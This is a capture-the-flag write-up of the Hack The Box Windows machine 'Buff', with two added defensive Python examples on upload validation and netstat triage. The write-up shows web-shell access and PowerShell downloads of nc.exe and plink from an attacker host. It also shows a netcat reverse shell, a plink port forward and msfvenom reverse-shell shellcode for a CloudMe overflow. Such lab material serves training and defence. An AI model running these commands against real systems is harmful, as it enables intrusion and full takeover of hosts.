
Buff Writeup [HTB]

Buff is a Windows machine from Hack The Box rated Easy. It consists of exploiting Gym Management Software 1.0 to obtain initial access and then, after setting up port forwarding, exploiting a buffer overflow in a binary running on the machine.

Enumeration

Running nmap:

nmap -sC -sV 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.079s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Browsing to port 8080 we find the following page:

[Screenshot: landing page served on port 8080]

Going to the contact page we see the site was built with Gym Management Software 1.0:

[Screenshot: contact page crediting Gym Management Software 1.0]

Exploitation

The following RCE exploit was found for Gym Management Software 1.0:

https://www.exploit-db.com/exploits/48506

Running the exploit we get a limited web shell:

python exploit.py  'http://10.10.10.198:8080/'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
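The exploit above works by pushing a PHP file through the application's image upload so that it lands under the document root (the web shell's working directory, C:\xampp\htdocs\gym\upload, is that upload folder). As an added, defender-side example that is not part of the writeup or of the Gym Management Software code base, the following Python shows the bypassable validation pattern next to a hardened version. The function names, the allowed-type list and the sample files are constructed for illustration.

```python
import os
import re
import secrets

# Leading magic bytes for the image types the upload endpoint is meant to accept.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Extensions the web server would hand to an interpreter if the file ever
# landed under the document root.
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar",
                     "asp", "aspx", "jsp", "cgi", "htaccess"}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def weak_check(filename: str, data: bytes) -> bool:
    """The bypassable pattern: inspect only the last extension and the leading
    magic bytes. A file named 'x.php.png' whose first bytes are a PNG header
    passes, even though the rest of it is PHP source."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in IMAGE_MAGIC and data.startswith(IMAGE_MAGIC[ext])


def hardened_check(filename: str, data: bytes, max_bytes: int = 2_000_000) -> str:
    """Validate an image upload and return the server-chosen name to store it as.

    The client-supplied name is used only to learn the claimed type; the stored
    name is random, carries exactly one allow-listed extension, and the content
    must match that extension. Raises UploadRejected otherwise.
    """
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    # Drop any directory components (Windows or POSIX separators).
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    # Exactly one extension: rejects 'shell.php.png', '.htaccess' and 'a.b.c'.
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise UploadRejected("name must be <simple-name>.<ext>")
    ext = parts[1]
    if ext in SCRIPT_EXTENSIONS or ext not in IMAGE_MAGIC:
        raise UploadRejected(f"extension .{ext} is not an allowed image type")
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not match the claimed image type")
    # Defence in depth: a PHP open tag has no business inside an image.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP open tag")
    return f"{secrets.token_hex(16)}.{ext}"


def accepted(filename: str, data: bytes) -> bool:
    """Convenience wrapper: True if hardened_check would store the file."""
    try:
        hardened_check(filename, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # Constructed samples: a bare PNG header and a PNG-headed file carrying PHP.
    real_png = IMAGE_MAGIC["png"] + bytes(64)
    polyglot = IMAGE_MAGIC["png"] + b"<?php echo 'hello'; ?>"
    print("weak check, shell.php.png:", weak_check("shell.php.png", polyglot))
    print("hardened check, shell.php.png:", accepted("shell.php.png", polyglot))
    print("hardened check, photo.png ->", hardened_check("photo.png", real_png))
```

The returned random name is what gets written to disk; the upload directory itself should live outside the document root, or at least have script execution disabled in the web server configuration, so that even a validation miss cannot turn into code execution.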

To obtain a complete shell, we can upload netcat to the machine.

First we set up a Python HTTP server to host the binary:

python -m SimpleHTTPServer 80

Now we download netcat onto the victim machine from the web shell:

C:\xampp\htdocs\gym\upload> powershell -c Invoke-WebRequest http://10.10.14.50/nc.exe -OutFile nc.exe

Using netcat to send a shell back to our listener:

C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.50 443

And we obtain a full shell as user shaun:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

Privilege Escalation

Enumerating the machine, I found CloudMe 1.11.2 inside Downloads:

Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe

Then, running tasklist, we see that CloudMe.exe is running:

C:\Users\shaun\Downloads>tasklist
CloudMe.exe                   2820                            0     36,396 K

Searching for that binary, I found a buffer overflow exploit for it:

https://www.exploit-db.com/exploits/48389

As the Windows machine didn't have Python, we need to use port forwarding to run the exploit from our own machine. Reading the exploit code, we see the service listens on port 8888.

For this purpose we will use plink, so that port 8888 on our machine reaches the CloudMe service listening on the victim's loopback interface:

C:\Users\shaun\Desktop>powershell -c Invoke-WebRequest http://10.10.14.50/plink.exe -OutFile plink.exe
C:\Users\shaun\Desktop>plink.exe -l root -pw hola123 -R 8888:127.0.0.1:8888 10.10.14.50
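The privilege escalation hinges on a service that only listens on 127.0.0.1, which a port forward makes reachable from the attacker's box. As an added, defender-side example that is not from the writeup, the Python below triages `netstat -ano` output against a PID-to-image-path table: it flags loopback-only listeners, images running from user-writable or web-served directories, and shell or tunnelling binaries holding outbound connections. The netstat text, the PID table and the CloudMe install path are constructed for this example and are not taken from the box.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of `netstat -ano` output. The 8080/8888 ports and the
# 10.10.14.50 attacker address mirror the writeup; PIDs and other ports are made up.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2400
  TCP    [::]:8080              [::]:0                 LISTENING       2400
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2820
  TCP    10.10.10.198:49600     52.0.0.1:443           ESTABLISHED     900
  TCP    10.10.10.198:49698     10.10.14.50:443        ESTABLISHED     3120
  TCP    10.10.10.198:49710     10.10.14.50:22         ESTABLISHED     3300
"""

# Constructed PID -> image path table, as `Get-Process | Select Id,Path` would
# give it. The CloudMe path is an assumption for the example.
SAMPLE_PID_PATHS = {
    2400: "C:\\xampp\\apache\\bin\\httpd.exe",
    2820: "C:\\Users\\shaun\\AppData\\Local\\Programs\\CloudMe\\CloudMe.exe",
    900: "C:\\Windows\\System32\\svchost.exe",
    3120: "C:\\xampp\\htdocs\\gym\\upload\\nc.exe",
    3300: "C:\\Users\\shaun\\Desktop\\plink.exe",
}

# Locations a low-privileged user (or a web shell) can write to.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\temp\\", "c:\\windows\\temp\\", "c:\\xampp\\htdocs\\")
# Binaries that rarely have a legitimate reason to hold an outbound connection.
SHELL_LIKE = {"cmd.exe", "powershell.exe", "nc.exe", "nc64.exe", "ncat.exe", "plink.exe"}

TCP_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


@dataclass
class Conn:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str
    pid: int


@dataclass
class Finding:
    pid: int
    exe: str
    endpoint: str
    reasons: list


def parse_netstat(text: str) -> list:
    """Parse the TCP rows of `netstat -ano` (UDP rows have no state column and are skipped)."""
    conns = []
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if m:
            conns.append(Conn(m[1], int(m[2]), m[3], int(m[4]), m[5], int(m[6])))
    return conns


def _is_loopback(ip: str) -> bool:
    try:
        return ipaddress.ip_address(ip.strip("[]")).is_loopback
    except ValueError:
        return False


def triage(conns: list, pid_paths: dict) -> list:
    """Attach one or more reasons to every connection worth a second look."""
    findings = []
    for c in conns:
        path = pid_paths.get(c.pid, "")
        exe = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        reasons = []
        if path.lower().startswith(USER_WRITABLE_PREFIXES):
            reasons.append("image runs from a user-writable or web-served directory")
        if c.state == "LISTENING" and _is_loopback(c.local_ip):
            reasons.append("loopback-only listener: reachable via port forwarding once any user has a shell")
        if c.state == "ESTABLISHED" and exe in SHELL_LIKE and not _is_loopback(c.remote_ip):
            reasons.append("shell or tunnelling binary holds an outbound connection")
        if reasons:
            endpoint = f"{c.local_ip}:{c.local_port} -> {c.remote_ip}:{c.remote_port}"
            findings.append(Finding(c.pid, exe, endpoint, reasons))
    return findings


def demo() -> list:
    return triage(parse_netstat(SAMPLE_NETSTAT), SAMPLE_PID_PATHS)


if __name__ == "__main__":
    for f in demo():
        print(f"PID {f.pid} ({f.exe}) {f.endpoint}")
        for r in f.reasons:
            print(f"    - {r}")
```

On the sample data the Apache listener and svchost pass quietly, while CloudMe (loopback listener installed under the user profile), nc.exe (web-root binary connected to an external host) and plink.exe (tunnel client) are each reported. A loopback bind is not an access control: the service still needs patching or removal.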

Now we generate fresh shellcode for the exploit with msfvenom:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.50 LPORT=4444 -b '\x00\x0A\x0D' -f python EXITFUNC=thread -v payload

Running the exploit gives us a reverse shell as Administrator:

python cloudme.py

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49719
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator

This post is licensed under CC BY 4.0 by the author.